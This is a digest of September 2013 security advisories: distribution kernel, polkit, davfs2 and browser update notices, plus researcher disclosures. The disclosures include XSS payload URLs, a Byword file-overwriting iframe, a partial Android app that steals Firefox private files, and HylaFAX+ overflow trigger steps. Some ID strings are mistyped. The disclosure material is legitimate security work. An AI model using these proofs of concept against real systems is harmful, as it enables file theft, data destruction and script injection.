[SECURITY] [DSA 2766-1] linux-2.6 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA-2766-1secur...@debian.org http://www.debian.org/security/ Dann Frazier September 27, 2013 http://www.debian.org/security/faq - -- Package: linux-2.6 Vulnerability : privilege escalation/denial of service/information leak Problem type : local/remote Debian-specific: no CVE Id(s) : CVE-2013-2141 CVE-2013-2164 CVE-2013-2206 CVE-2013-2232 CVE-2013-2234 CVE-2013-2237 CVE-2013-2239 CVE-2013-2851 CVE-2013-2852 CVE-2013-2888 CVE-2013-2892 Several vulnerabilities have been discovered in the Linux kernel that may lead to a denial of service, information leak or privilege escalation. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2013-2141 Emese Revfy provided a fix for an information leak in the tkill and tgkill system calls. A local user on a 64-bit system maybe able to gain access to sensitive memory contents. CVE-2013-2164 Jonathan Salwan reported an information leak in the CD-ROM driver. A local user on a system with a malfunctioning CD-ROM drive could gain access to sensitive memory. CVE-2013-2206 Karl Heiss reported an issue in the Linux SCTP implementation. A remote user could cause a denial of service (system crash). CVE-2013-2232 Dave Jones and Hannes Frederic Sowa resolved an issue in the IPv6 subsystem. Local users could cause a denial of service by using an AF_INET6 socket to connect to an IPv4 destination. CVE-2013-2234 Mathias Krause reported a memory leak in the implementation of PF_KEYv2 sockets. Local users could gain access to sensitive kernel memory. CVE-2013-2237 Nicolas Dichtel reported a memory leak in the implementation of PF_KEYv2 sockets. Local users could gain access to sensitive kernel memory. CVE-2013-2239 Jonathan Salwan discovered multiple memory leaks in the openvz kernel flavor. Local users could gain access to sensitive kernel memory. CVE-2013-2851 Kees Cook reported an issue in the block subsystem. Local users with uid 0 could gain elevated ring 0 privileges. This is only a security issue for certain specially configured systems. CVE-2013-2852 Kees Cook reported an issue in the b43 network driver for certain Broadcom wireless devices. Local users with uid 0 could gain elevated ring 0 privileges. This is only a security issue for certain specially configured systems. CVE-2013-2888 Kees Cook reported an issue in the HID driver subsystem. A local user, with the ability to attach a device, could cause a denial of service (system crash). CVE-2013-2892 Kees Cook reported an issue in the pantherlord HID device driver. Local users with the ability to attach a device could cause a denial of service or possibly gain elevated privileges. For the oldstable distribution (squeeze), this problem has been fixed in version 2.6.32-48squeeze4. The following matrix lists additional source packages that were rebuilt for compatibility with or to take advantage of this update: Debian 6.0 (squeeze) user-mode-linux 2.6.32-1um-4+48squeeze4 We recommend that you upgrade your linux-2.6 and user-mode-linux packages. Note: Debian carefully tracks all known security issues across every linux kernel package in all releases under active security support. However, given the high frequency at which low-severity security issues are discovered in the kernel and the resource requirements of doing an update, updates for lower priority issues will normally not be released for all kernels at the same time. Rather, they will be released in a staggered or leap-frog fashion. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.14 (GNU/Linux) iQIcBAEBAgAGBQJSRhLtAAoJEBv4PF5U/IZA18oP/jpZRZu3XXN7t4GOLeH94vgg OyKwG+EyltAjYAq4XfCjUens5SfH8BylfXITpEkq2d2AWVI/K2fsuStpDbeHLtPo p1+x3s1xQynxQLPrnqZlOqs58iHEnKF/A9NyJHu/rAO1iA24B8hcNGPTWEL6007Z MWqJ0avaTXtgvOk/jRumR3qVlW0fskK5uS9lIVRX/S2WWQ2LPLwJ9URLV6YGeoi5 gyMGCMgkqiMQsGt4CTCoLjk26R/W70ed138088sZOMqHxaMlAImDClOMpnD9i/2g XQ9mP0htmcyCdDB6I2H4QCQ6+YzAi424EL2j5b4ZX4NMjHs0sUYNfYWY/mRyg2kB o6GI+ZRXl7N02nZw6ugFU/HTk7J2IVFbtYUf7KclJR74QkcKTSFxTOKZQp4ElZU2 gvdL4764JK8IfW0dk+jK7uzENWfu+U1JT8t+Ta8iuLKf+dx7BDT8uX9ebfSELJxo 5RX1OdmUcgIJsRxngPkr79QGIV13s1G/Af3dFqDGjCeOqlKS96OuatpkA45hwjEr LSKoVRX63zePo8Ru7NH6OLNI37RGCxHOwGO5Xu0lOR7NAizQ2afvcDnKfAh7DV9D
[ MDVSA-2013:243 ] polkit
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2013:243 http://www.mandriva.com/en/support/security/ ___ Package : polkit Date: September 27, 2013 Affected: Business Server 1.0 ___ Problem Description: Updated polkit packages fix security vulnerability: A race condition was found in the way the PolicyKit pkcheck utility checked process authorization when the process was specified by its process ID via the --process option. A local user could use this flaw to bypass intended PolicyKit authorizations and escalate their privileges (CVE-2013-4288). Note: Applications that invoke pkcheck with the --process option need to be modified to use the pid,pid-start-time,uid argument for that option, to allow pkcheck to check process authorization correctly. Because of the change in the PolicyKit API, hplip (CVE-2013-4325), rtkit (CVE-2013-4326), and systemd (CVE-2013-4327) packages have been updated to use a different API that is not affected by this PolicyKit vulnerability. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4288 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4325 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4326 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4327 https://bugs.mageia.org/show_bug.cgi?id=11260 ___ Updated Packages: Mandriva Business Server 1/X86_64: a505f84a730fe73329a47e34c63a7dbe mbs1/x86_64/hplip-3.12.4-1.1.mbs1.x86_64.rpm 3a4ba0c6f598df5d0a895e92d86bdee6 mbs1/x86_64/hplip-doc-3.12.4-1.1.mbs1.x86_64.rpm 5ff79b31c0d10f328cb3a33e73ee443f mbs1/x86_64/hplip-hpijs-3.12.4-1.1.mbs1.x86_64.rpm 06ad03c60671fdc268f68c19abccdead mbs1/x86_64/hplip-hpijs-ppds-3.12.4-1.1.mbs1.x86_64.rpm 464c910aa533f8a8bb2f2c3022127339 mbs1/x86_64/hplip-model-data-3.12.4-1.1.mbs1.x86_64.rpm c868787d3990ecfdae81124e449b9fe5 mbs1/x86_64/lib64hpip0-3.12.4-1.1.mbs1.x86_64.rpm 16b802096b39e33c3c2e048e5034f6ee mbs1/x86_64/lib64hpip0-devel-3.12.4-1.1.mbs1.x86_64.rpm d9832f1d43a46d48de126d112744a63f mbs1/x86_64/lib64polkit1_0-0.104-6.1.mbs1.x86_64.rpm 7cb376fc2241b8ef5d9fec5d56f8b44e mbs1/x86_64/lib64polkit1-devel-0.104-6.1.mbs1.x86_64.rpm 6bd18537f831797178c8d8797ddb38c8 mbs1/x86_64/lib64polkit-gir1.0-0.104-6.1.mbs1.x86_64.rpm bf1d4dfcde5c3268d93d3410686390cf mbs1/x86_64/lib64sane-hpaio1-3.12.4-1.1.mbs1.x86_64.rpm 03c53c95ae85aa80d715eba6cb0a568e mbs1/x86_64/lib64systemd-daemon0-44-16.1.mbs1.x86_64.rpm 3d652b24d8237db4354232c58da626f7 mbs1/x86_64/lib64systemd-daemon0-devel-44-16.1.mbs1.x86_64.rpm 720ca216bd163136e6157fae2ce3a8ce mbs1/x86_64/lib64systemd-id1280-44-16.1.mbs1.x86_64.rpm 3dec561fc60e5670f775759d279b73f9 mbs1/x86_64/lib64systemd-id1280-devel-44-16.1.mbs1.x86_64.rpm a5f09de0fe35f59d4f03c44d60706fc8 mbs1/x86_64/lib64systemd-journal0-44-16.1.mbs1.x86_64.rpm 1aa5d342f5e1ea17ad23a3adcb846b67 mbs1/x86_64/lib64systemd-journal0-devel-44-16.1.mbs1.x86_64.rpm 989d00585eda3757067bd7757760d21f mbs1/x86_64/lib64systemd-login0-44-16.1.mbs1.x86_64.rpm a64fbbeaf21c77c50bda1fff4278a34c mbs1/x86_64/lib64systemd-login0-devel-44-16.1.mbs1.x86_64.rpm 03ba458caeb642419984d0984ea156b9 mbs1/x86_64/polkit-0.104-6.1.mbs1.x86_64.rpm f58526b0a6b7dd710d6ae50c401f3ca1 mbs1/x86_64/polkit-desktop-policy-0.104-6.1.mbs1.noarch.rpm 535391c9d869772e68cd13adac519113 mbs1/x86_64/rtkit-0.10-3.1.mbs1.x86_64.rpm 867308654e786d01f4c66054cca07ab5 mbs1/x86_64/systemd-44-16.1.mbs1.x86_64.rpm 52e155e8f9d39745da50bd8bcea8cd54 mbs1/x86_64/systemd-sysvinit-44-16.1.mbs1.x86_64.rpm f71f9b8a5f1676bc3af636e510f9c7a8 mbs1/x86_64/systemd-tools-44-16.1.mbs1.x86_64.rpm 959a6d57120d110fc44178581105eb55 mbs1/x86_64/systemd-units-44-16.1.mbs1.x86_64.rpm 119ee4665dda5c72402c2fdf7d6c5298 mbs1/SRPMS/hplip-3.12.4-1.1.mbs1.src.rpm f78ac8cf2fc3c60849ae806c1de0c4dd mbs1/SRPMS/polkit-0.104-6.1.mbs1.src.rpm 0af0c0abd85fc991c6592365cc93dd6e mbs1/SRPMS/rtkit-0.10-3.1.mbs1.src.rpm 3ac52aac654aaf3f3fefde1207e827e4 mbs1/SRPMS/systemd-44-16.1.mbs1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report
[IBliss Security Advisory] Cross-site scripting ( XSS ) in PHP IDNA Convert
[ PHP IDNA Convert Cross-site scripting ( XSS ) ] [ Vendor product description] PHP Net_IDNA is a class to convert between the Punycode and Unicode formats. Punycode is a standard described in RFC 3492 and part of IDNA (Internationalizing Domain Names in Applications [RFC3490]) . This class allows PHP scripts to convert these domain names without having one of the PHP extensions installed. It supports both IDNA 2003 and IDNA 2008. [ Bug Description ] Cross-site scripting (XSS) vulnerability in parameters encoded/decoded in the class PHP IDNA Convert allows remote attackers to inject arbitrary web script or HTML. [ History ] Advisory sent to vendor on 09/24/2013 Vendor reply on 09/25/2013 Vulnerability fixed on 09/26/2013 [ Impact ] HIGH [ Afected Version ] 0.8.0 [ Vendor Reply ] Yes. Version 0.8.1 released [ CVE Reference ] [ PoC ] Payloads: http://[host]/idna_convert/index.php?decoded=94102%22%20onmouseover%3dprompt(929882)%20bad%3d%22encode=Encode%20idn_version=2003 http://[host]/idna_convert/example.php?decode=%20Decodeencoded=94102%22%20onmouseover%3dprompt(938200)%20bad%3d%22 http://[host]/index.php/%22onmouseover%3d%27prompt%28976724%29%27bad%3d%22%3E [ References ] [1] PHP IDNA Convert - http://phlymail.com/en/downloads/idna-convert.html [2] Owasp Cross-site scripting - https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ iBliss Segurança e Inteligência - Sponsor: Alexandro Silva - Alexos alexos (at) ibliss.com (dot) br [email concealed]
Linux Kernel Patches For Linux Kernel Security
Hi forks! I release an article for linux kernel security. - http://www.x90c.org/articles/linux_kernel_patches.txt x90c
[slackware-security] seamonkey (SSA:2013-271-01)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [slackware-security] seamonkey (SSA:2013-271-01) New seamonkey packages are available for Slackware 14.0 and -current to fix security issues. Here are the details from the Slackware 14.0 ChangeLog: +--+ patches/packages/seamonkey-2.21-i486-1_slack14.0.txz: Upgraded. This update contains security fixes and improvements. For more information, see: http://www.mozilla.org/security/known-vulnerabilities/seamonkey.html (* Security fix *) patches/packages/seamonkey-solibs-2.21-i486-1_slack14.0.txz: Upgraded. +--+ Where to find the new packages: +-+ Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the Get Slack section on http://slackware.com for additional mirror sites near you. Updated packages for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/seamonkey-2.21-i486-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/seamonkey-solibs-2.21-i486-1_slack14.0.txz Updated packages for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/seamonkey-2.21-x86_64-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/seamonkey-solibs-2.21-x86_64-1_slack14.0.txz Updated packages for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/seamonkey-solibs-2.21-i486-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/seamonkey-2.21-i486-1.txz Updated packages for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/seamonkey-solibs-2.21-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/seamonkey-2.21-x86_64-1.txz MD5 signatures: +-+ Slackware 14.0 packages: ddb9d5b02abd2959e86dda85f3c99427 seamonkey-2.21-i486-1_slack14.0.txz e5bfdbe2609579ad29c8ef265557cc82 seamonkey-solibs-2.21-i486-1_slack14.0.txz Slackware x86_64 14.0 packages: 5bc6509907f5fac6294e00f6f3b8095f seamonkey-2.21-x86_64-1_slack14.0.txz 46a11a3c8882227d9273ffb249532c11 seamonkey-solibs-2.21-x86_64-1_slack14.0.txz Slackware -current packages: d69931416f3e6b9c03839f67b825cc6a l/seamonkey-solibs-2.21-i486-1.txz 0e77abc3c7bfa8e8eaeef9f084cdac8f xap/seamonkey-2.21-i486-1.txz Slackware x86_64 -current packages: f59f929929100b76a654638f76da8e10 l/seamonkey-solibs-2.21-x86_64-1.txz d0d5ce856e86b283154e64c279558a1b xap/seamonkey-2.21-x86_64-1.txz Installation instructions: ++ Upgrade the packages as root: # upgradepkg seamonkey-2.21-i486-1_slack14.0.txz seamonkey-solibs-2.21-i486-1_slack14.0.txz +-+ Slackware Linux Security Team http://slackware.com/gpg-key secur...@slackware.com ++ | To leave the slackware-security mailing list: | ++ | Send an email to majord...@slackware.com with this text in the body of | | the email message: | || | unsubscribe slackware-security | || | You will get a confirmation message back containing instructions to| | complete the process. Please do not reply to this email address. | ++ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.14 (GNU/Linux) iEYEARECAAYFAlJHk1QACgkQakRjwEAQIjMALwCdEODgAGSbbA1ahL1cL/rs7lWo 6CUAn3l6MgVkdLgO78Idp1wOQM+IINFK =OXUp -END PGP SIGNATURE-
[SECURITY] [DSA 27671-1] proftpd-dfsg security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2767-1 secur...@debian.org http://www.debian.org/security/Nico Golde September 29, 2013 http://www.debian.org/security/faq - - Package: proftpd-dfsg Vulnerability : denial of service Problem type : remote Debian-specific: no CVE ID : CVE-2013-4359 Debian Bug : 723179 Kingcope discovered that the mod_sftp and mod_sftp_pam modules of proftpd, a powerful modular FTP/SFTP/FTPS server, are not properly validating input, before making pool allocations. An attacker can use this flaw to conduct denial of service attacks against the system running proftpd (resource exhaustion). For the oldstable distribution (squeeze), this problem has been fixed in version 1.3.3a-6squeeze7. For the stable distribution (wheezy), this problem has been fixed in version 1.3.4a-5+deb7u1. For the testing (jessie) unstable (sid) distributions, this problem will be fixed soon. We recommend that you upgrade your proftpd-dfsg packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.14 (GNU/Linux) iQIcBAEBCgAGBQJSSETZAAoJEM1LKvOgoKqqLY0QAL6FDDkvW6Xgnenra8vic2OR YCU0rSzN8eXcbuO3X1vUecUj7dcY8hrFcA0EgNTOK1x7GZHUXfFg5KpVj7/KBawL V4d0glQEqBrsi+6b/MxNlHP7dvKLMVuRSVdf8tfRjsDBXNOVW303se4b9fyTNx3i xAKkbfhDioM3uRfK+j49GhcxosuUE3blAKAB3oAX2BEMTbiGTbgniXfPiZEf2Vfe 1Hq4myEWK/Cd51Cw21+fZPC6sj3Xg5ffYUSZ7UakxednLvbHMnFIG1t9MLXEiAEx /VFxjnExnztZTAx2cgBbqO+y5JXprHg1V5Q/B2EWzYcSJ/gSGXYnf33JUnaSMsik rPv+/ubC+c0MuYtoi1z+lIzNyOTRr0IJn11C4/E8HRJi98fhWuLhxq8Qgtrh9HiM E5sWvxQAEBp2BYI/3Rxn2gz4BuVzl/TLXdegGeS9CpxxqHYuoulFp43RtYhUTDmQ 34Y2x074Mx6zbabK4OociuXLdx2t8WAaU2x/D2tI97fc8RCRy7CJFIISKmPPL7Jx xts13MYynwPIkrGihFSu2dYSmAz+Mqorczjbu1ZkBCFuOzPl1W/ibPe3VuhaVydK t8i4Ak71UaQxSzClAXmZw/wUvsPZCEJrgS+Jwb9WFM+AzBUoLkdQMusNqhUD3X07 Cc6BpuMQzU+pMhDg6Xwl =2l5u -END PGP SIGNATURE-
[CVE-2013-5725] - Byword for iOS Data Destruction Vulnerability
- Affected Vendor: http://metaclassy.com/ - Affected Software: Byword for iOS - Affected Version: 2.x prior to 2.1 - Issue Type: Lack of validation/user confirmation leading to destruction of data - Release Date: 29 Sept 2013 - Discovered by: Guillaume Ross - CVE Identifier: CVE-2013-5725 - Issue Status: Vendor has published version 2.1 which adds a confirmation prompt to prevent the issue. **Summary** Byword is a text editor for iOS and OS X that can use iCloud or Dropbox to sync documents. Byword supports actions through X-URLs on iOS. One of the supported action replaces a file with the value passed through the URL. **Description** The Replace file action in the affected version does not warn the user and replaces the content of the target file with text specified in the X-URL. The attacker must know the path to the file, but considering iCloud does not have subfolders, it makes it easier to guess filenames such as todo.txt file or an important.txt file, or the attacker could have received a file created by the victim using Byword and can guess the filename from the title. **Impact** The file can be overwritten and the data could be lost permanently. **Proof of Concept** byword://replace?location=icloudpath=name=Important.txttext=haha This URL would replace the content of the file Important.txt in the user's iCloud container for Byword with haha. By using iframes, the attacker can embed this attack in a web page. Safari on iOS will automatically launch Byword and overwrite the file. iframe src=byword://replace?location=icloudpath=name=Important.txttext=haha/iframe **Response Timeline** - August 26 2013 - Vendor notified - August 26 2013 - Vendor acknowledges vulnerability - September 18 2013 - Update released that adds a warning/confirmation screen - September 29 2013 - Advisory released
Firefox for Android - Same-origin bypass through symbolic links
CVE Number: CVE-2013-1727
Vender Identifier: MFSA 2013-84
Title: Firefox for Android - Same-origin bypass through
symbolic links
Affected Software: Prior to v24 (confirmed on v14)
Credit: Takeshi Terada of Mitsui Bussan Secure Directions, Inc.
Issue Status: v24 was released which fixes this vulnerability
Overview:
Firefox for Android's Same-Origin Policy for local files (file: URI) can
be bypassed by using symbolic links. It results in theft of Firefox's
private files by malicious Android apps.
Details:
As described in MDN Document (*), Firefox allows a local file to read
another file, only if the parent directory of the originating file is an
ancestor directory of the target file.
* https://developer.mozilla.org/en-US/docs/Same-origin_policy_for_file:_URIs
However, it is possible to circumvent the restriction by a trick using
symbolic link.
This issue enables malicious Android apps to steal Firefox's private
files such as Cookie file.
As an example, steps to steal Firefox's profiles.ini are described below:
1. An attacker's app creates a malicious HTML file, and makes Firefox load
its URL with file scheme. The malicious HTML contains JavaScript code
which, a few seconds later, tries to read the same URL with itself via
XMLHttpRequest.
uWait a few seconds./u
script
function doit() {
var xhr = new XMLHttpRequest;
xhr.onload = function() {
alert(xhr.responseText);
};
xhr.open('GET', document.URL);
xhr.send(null);
}
setTimeout(doit, 8000);
/script;
2. Before XHR fires, the attacker's app replaces the malicious HTML with
a symbolic link pointing to Firefox's profiles.ini file.
3. When XHR fires, Firefox follows the symlink and provides the content
of the profiles.ini file to the malicious HTML.
Through the steps above, the attacker's app can gain the path of the
Firefox's private files such as Cookie file. The attacker's app can also
get the contents of those private files in a similar manner.
Note:
It should be noted that this issue does not matter in Firefox for normal
PC platform (such as Windows OS), in which all apps are regarded as
reasonably trustworthy. However it does matter in Android platform with
sandbox security model intended to segretate apps. In such platforms,
app developers cannot regard other apps as trustworty.
By this difference in platform security model, Android apps that are
ported from PC often suffer from unexpected vulnerabilities. Obviously
such vulnerabilities are not specific to Firefox. In reality, I
discovered such vulnerabilities in Chrome for Android last year.
Chrome for Android vulnerabilities:
1. http://seclists.org/bugtraq/2013/Jan/22
2. http://seclists.org/bugtraq/2013/Jan/23
3. http://seclists.org/bugtraq/2013/Jan/24
4. http://seclists.org/bugtraq/2013/Jan/25
5. http://seclists.org/bugtraq/2013/Jan/26
(#4 is a quite similar issue as the issue described in this advisory)
Proof of Concept:
/
// malicious android app that steals Firefox's profiles.ini file
/
package jp.mbsd.terada.attackfirefox1;
import android.net.Uri;
import android.os.Bundle;
import android.app.Activity;
import android.content.Intent;
public class MainActivity extends Activity {
public final static String MY_PKG =
jp.mbsd.terada.attackfirefox1;
public final static String MY_TMP_DIR =
/data/data/ + MY_PKG + /tmp/;
public final static String HTML_PATH =
MY_TMP_DIR + A + Math.random() + .html;
public final static String TARGET_PKG =
org.mozilla.firefox;
public final static String TARGET_FILE_PATH =
/data/data/ + TARGET_PKG + /files/mozilla/profiles.ini;
public final static String HTML =
uWait a few seconds./u +
script +
function doit() { +
var xhr = new XMLHttpRequest; +
xhr.onload = function() { +
alert(xhr.responseText); +
}; +
xhr.open('GET', document.URL); +
xhr.send(null); +
} +
setTimeout(doit, 8000); +
/script;
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
doit();
}
public void doit() {
try {
// create a malicious HTML
cmdexec(mkdir + MY_TMP_DIR);
cmdexec(echo \ + HTML + \ + HTML_PATH);
cmdexec(chmod -R 777 + MY_TMP_DIR);
Thread.sleep(1000);
// force Firefox to load the malicious HTML
invokeFirefox(file:// + HTML_PATH);
Open-Xchange Security Advisory 2013-09-30
Product: Open-Xchange AppSuite Vendor: Open-Xchange GmbH Internal reference: 28642 (Bug ID) Vulnerability type: CWE-80 (Improper Neutralization of Script-Related HTML Tags in a Web Page) Vulnerable version: prior to 7.2.2 Vulnerable component: backend Fixed version: 7.0.2-rev16, 7.2.2-rev20 Report confidence: Confirmed Solution status: Fixed by Vendor Vendor notification: 2013-09-02 Solution date: 2013-09-12 Public disclosure: 2013-09-30 CVE reference: CVE-2013-5690 CVSSv2: 5.7 (AV:N/AC:L/Au:S/C:N/I:P/A:N/E:F/RL:U/RC:C/CDP:LM/TD:H/CR:ND/IR:ND/AR:ND) Vulnerability Details: File contents are sanitized to avoid script execution be rogue content. For performance reasons, the sanitation takes place for requests where the MIME type indicates that the content will be displayed/executed within the browser context. While the most commonly used MIME-types are covered (text/html), some browsers also execute script code within files signalled with text/xml MIME-type. Risk: Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.) Solution: Users should update to the latest available patch releases. Internal reference: 28635 (Bug ID) Vulnerability type: CWE-80 (Improper Neutralization of Script-Related HTML Tags in a Web Page) Vulnerable version: prior to 7.2.2 Vulnerable component: backend Fixed version: 7.0.2-rev16, 7.2.2-rev20 Report confidence: Confirmed Solution status: Fixed by Vendor Vendor notification: 2013-09-02 Solution date: 2013-09-12 Public disclosure: 2013-09-30 CVE reference: CVE-2013-5690 CVSSv2: 5.7 (AV:N/AC:L/Au:S/C:N/I:P/A:N/E:F/RL:U/RC:C/CDP:LM/TD:H/CR:ND/IR:ND/AR:ND) Vulnerability Details: Entering script code to an appointments Status comment field is possible and not sanitized. The script code is executed when printing the appointment. Risk: Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.) Solution: Users should update to the latest available patch releases. Internal reference: 28538 (Bug ID) Vulnerability type: CWE-113 (Improper Neutralization of CRLF Sequences in HTTP Headers) aka 'HTTP Response Splitting' Vulnerable version: prior to 7.2.2 Vulnerable component: backend Fixed version: 7.0.2-rev16, 7.2.2-rev20 Report confidence: Confirmed Solution status: Fixed by Vendor Vendor notification: 2013-08-27 Solution date: 2013-09-12 Public disclosure: 2013-09-30 CVE reference: CVE-2013-5690 CVSSv2: 5.7 (AV:N/AC:L/Au:S/C:N/I:P/A:N/E:F/RL:U/RC:C/CDP:LM/TD:H/CR:ND/IR:ND/AR:ND) Vulnerability Details: It's possible to use the /ajax/defer servlet to create malicious HTTP responses by injecting crafted HTTP headers. This issue occurs when using AJP as a backend connector to OX while HTTP based connectors return an error message for that request. Risk: A user may be tricked to open a link pointing to a trusted URL. However, by crafting malicious parameters to this request, it's possible to inject HTTP headers. These may be used to redirect the user to an unexpected website or offer unsolicited content in the context of a trusted domain. Solution: Users should update to the latest available patch releases.
[ MDVSA-2013:244 ] davfs2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2013:244 http://www.mandriva.com/en/support/security/ ___ Package : davfs2 Date: September 30, 2013 Affected: Business Server 1.0, Enterprise Server 5.0 ___ Problem Description: A vulnerability has been discovered and corrected in davfs2: Davfs2, a filesystem client for WebDAV, calls the function system() insecurely while is setuid root. This might allow a privilege escalation (CVE-2013-4362). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4362 http://www.debian.org/security/2013/dsa-2765 ___ Updated Packages: Mandriva Enterprise Server 5: f0853a536a00aa39b994df01dade61c5 mes5/i586/davfs2-1.3.3-1.1mdvmes5.2.i586.rpm 0b7bf41ff10ccfed01f0cd050cd1eb36 mes5/SRPMS/davfs2-1.3.3-1.1mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: aad5a3a3e974b458b3088a34c15daffb mes5/x86_64/davfs2-1.3.3-1.1mdvmes5.2.x86_64.rpm 0b7bf41ff10ccfed01f0cd050cd1eb36 mes5/SRPMS/davfs2-1.3.3-1.1mdvmes5.2.src.rpm Mandriva Business Server 1/X86_64: cf2712a4255fe5b908fc516ac392ee08 mbs1/x86_64/davfs2-1.4.6-2.1.mbs1.x86_64.rpm 1870bfd952eeb78a7ed655c87e7b1b2e mbs1/SRPMS/davfs2-1.4.6-2.1.mbs1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFSSUoTmqjQ0CJFipgRAtYVAKCTY47LexjDiIuYnAvpRiHsZysiNQCgycRi IwTuT7yEkUtCutNRRSoleGk= =yR1B -END PGP SIGNATURE-
CVE-2130-5680, HylaFAX+ heap overflow, unchecked network traffic.
Details === Application: HylaFAX+ Version: 5.2.4 (April, 2008) through 5.5.3 (August 6, 2013) Type: Daemon that manages a fax server via an FTP-like protocol. Vendor / Maintainer: Lee Howard (faxguy _at_ howardsilvan.com) Project Homepage: http://hylafax.sourceforge.net/ Vulnerability: CWE-120: Classic buffer overflow from unchecked network traffic, resulting in heap corruption. Vulnerability Discoverer: Dennis Jenkins (dennis.jenkins.75 _at_ gmail.com) CVE reference: CVE-2130-5680, 2013-09-03 Solution Status: Fixed by vendor. Description === HylaFAX™ is an enterprise-class open-source system for sending and receiving facsimiles as well as for sending alpha-numeric pages. Vulnerability === HylaFAX+ contains a daemon, hfaxd, that allows a fax client to communicate with the fax server to submit fax jobs, query status, configure modems, etc... The underlying wire protocol is a super-set of classic FTP. hfaxd can be compiled with support for authenticating users via LDAP, although usually, one just configured hfaxd to use PAM. The code path for authenticating users via LDAP allocates a 255-byte buffer (via the C++ new operator), and then strcats user-supplied data buffered from the inbound FTP control channel. Other code limits the amount of copied data to 506 bytes, and truncates on NULL and \n. Thus it is possible for an UNAUTHENTICATED remote attacker to overflow the heap with a limited character set. At a minimum, this can crash or hang a hfaxd forked client. At this time, we have not attempted to construct an actual exploit that leverages this security bug. “hfaxd” typically runs as the “uucp” user, and forks on each new connection. The heap overflow occurs in a forked child. Typically, the child will simply hang. We theorize (but have not tested) that an attacker could consume system resources by abusing the heap overflow. Although this has not been confirmed, the possibility that an attacker may be able to execute arbitrary code in the hfaxd context can not be ruled out. It should be noted that the principle author of HylaFAX+, Lee Howard, did not write the LDAP code - it was supplied by a third party. After I discovered the bug, Lee and I worked together to fix it, exchanging code patches, performing peer-review and testing. All use of strcat was replaced with snprintf. For the vulnerability to be exposed, one must first compile HylaFAX+with LDAP support, and then configure LDAP in hfaxd.conf. Simply compiling with LDAP support alone is insufficient to produce a vulnerable system. Lee and I suspect that the number of HylaFAX+ installations with LDAP support configured are extremely low, if not zero. This vulnerability does not exist in other versions of HylaFAX. HylaFAX+ was forked from code at hylafax.org in 2005, 3 years before the problematic LDAP code was added to HylaFAX+ Solution === 1) Update to HylaFAX+ v5.5.4 (http://hylafax.sourceforge.net/news/5.5.4.php) or later. -OR- 2) Disable LDAP authentication (edit hfaxd.conf) Proof-of-concept === 1) Enable LDAP authentication on the hfaxd server. Note, a valid LDAP server need not exist. Simply setting the “LDAPServerURI:” directive in “/usr/local/lib/fax/hfaxd.conf” is sufficient. # grep ^LDAPServerURI /usr/local/lib/fax/hfaxd.conf LDAPServerURI: ldap://127.0.0.1:389 2) Start (or restart) the hfaxd process. Run inside valgrind to see the heap overwrite get caught. # valgrind ./hfaxd/hfaxd -c /usr/local/lib/fax/hfaxd.conf -l 192.168.2.33 -q /var/spool/fax -i hylafax -d 3) Run this script from a client system. NOTE: If testing on the same server as the host, don’t connect to “localhost” / 127.0.0.1. This will not invoke LDAP (not sure why): # # Test 